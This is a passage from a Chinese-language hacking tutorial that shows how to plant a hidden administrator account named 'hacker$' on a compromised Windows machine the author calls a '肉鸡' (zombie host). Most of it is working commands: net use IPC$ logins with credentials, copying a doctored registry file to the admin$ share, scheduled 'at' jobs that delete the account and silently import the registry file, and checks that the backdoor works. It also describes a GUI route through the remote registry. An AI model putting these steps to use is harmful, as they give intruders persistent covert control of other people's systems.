修改的方法图形界中已经介绍过了，这里就不作介绍了。

　　6、再将编辑好的hacker.reg拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg

　　7、查看肉鸡时间:net time 13.50.97.238 然后用at命令将用户hacker$删除:

　　at 13.50.97.238 13:40 net user hacker$ /del

　　8、验证hacker$是否删除:用

　　net use 13.50.97.238 /del 断开与肉鸡的连接。

　　net use 13.50.97.238ipc$ “1234“ /user:“hacker$“ 用帐户hacker$与肉鸡连接，不能连接说明已删除。

　　9、再与肉鸡建立连接:net use 13.50.97.238ipc$ “12345678“ /user:“administrator“

　　再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

　　at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

　　regedit.exe的参数/s是指安静模式。

　　10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

　　11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

　　12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

　　三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办?

　　这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。